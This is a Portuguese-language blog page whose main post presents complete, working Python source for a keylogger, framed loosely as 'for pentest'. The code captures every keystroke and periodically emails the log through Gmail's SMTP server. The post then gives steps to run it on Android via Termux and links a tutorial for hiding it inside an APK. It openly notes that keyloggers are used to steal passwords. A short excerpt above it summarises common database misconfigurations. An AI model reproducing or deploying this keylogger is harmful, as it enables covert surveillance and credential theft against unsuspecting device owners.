Pular para o conteúdo principal

Destaques

Relatório de Vulnerabilidade: Bancos de Dados e Big Data

  Introdução Neste relatorio eu analisei algumas vulnerabilidade em bancos de dados e ambientes de big datas, onde muitas empresas nao tem uma segurança adequada. Esses sistemas armazena grande volume de dados sensiveis e por isso vira alvo facil de atacantes. Objetivo O objetivo desse teste foi indentificar falhas de segurança em banco de dados e tambem em plataformas de big data, avaliando riscos, impacto e meios de atack mais comuns. Principais Vulnerabilidades Encontradas Credenciais fracas: varios sistemas utilizavam senhas simples ou padrão (admin/admin), facilitando acessos indevidos. Falta de criptografia: dados sensiveis estava armazenado sem criptografia, permitindo leitura direta caso haja acesso. Exposição de portas: portas como 3306 (MySQL), 5432 (PostgreSQL) e 27017 (MongoDB) estavam aberta para internet. Configuração incorreta: servidores mal configurado permitindo acesso remoto sem restrição ou whitelist. Backup exposto: arquivos de backup (.sql, .bak) disponivel pu...
Postar um comentário
Read more »
Marcadores

CRIEI UM keylogger PARA PENTEST

 


Vamos programar um Keylogger!!!

Que tem a função de registrar todas as teclas dos déspositivos!!!

Muito usado por hack !!! Para pega SENHAS 🔑


!!!

python.PY 

import pynput.keyboard
import threading
import smtplib

class Keylogger:
    def __init__(self, email, password, interval):
        self.log = "Keylogger iniciado..."
        self.email = email
        self.password = password
        self.interval = interval

    def append_to_log(self, string):
        self.log = self.log + string

    def process_key_press(self, key):
        try:
            current_key = str(key.char)
        except AttributeError:
            if key == key.space:
                current_key = " "
            else:
                current_key = " " + str(key) + " "
        self.append_to_log(current_key)

    def report(self):
        if self.log:
            self.send_email(self.email, self.password, "\n\n" + self.log)
        self.log = ""
        timer = threading.Timer(self.interval, self.report)
        timer.start()

    def send_email(self, email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()

    def start(self):
        keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
        with keyboard_listener:
            self.report()
            keyboard_listener.join()

if __name__ == "__main__":
    email = input("Digite seu e-mail: ")
    password = input("Digite sua senha: ")
    interval = int(input("Digite o intervalo de envio de logs (em segundos): "))
    keylogger = Keylogger(email, password, interval)
    keylogger.start()

!!!

Para executar este script Python em um dispositivo Android, você pode seguir estes passos:

  1. 1.Instale o Python em seu dispositivo Android, você pode usar aplicativos como o Termux para isso.

  2. Copie o script Python para o dispositivo Android.

  3. Execute o script Python no Termux ou em outro terminal no dispositivo Android.

  4. Forneça seu e-mail, senha e intervalo de envio de logs quando solicitado.


 se preferir você pode colocar em um APK !!! 👇
                                 Tutorial Basico=Colocando Keylogger em um APK


Tutorial Basico de como se PROTEGER=keylpgger



Copyright © 2024 (zxyurikauan). Todos os direitos reservados


Labels:

Comentários

Postar um comentário

Postagens mais visitadas